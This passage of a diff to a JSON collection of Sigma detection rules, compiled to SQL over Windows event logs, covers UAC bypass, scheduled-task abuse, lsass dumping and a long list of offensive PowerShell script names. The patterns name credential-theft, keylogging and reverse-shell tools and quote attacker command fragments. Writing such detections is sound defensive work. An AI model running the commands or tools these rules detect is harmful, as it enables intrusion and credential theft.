logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' 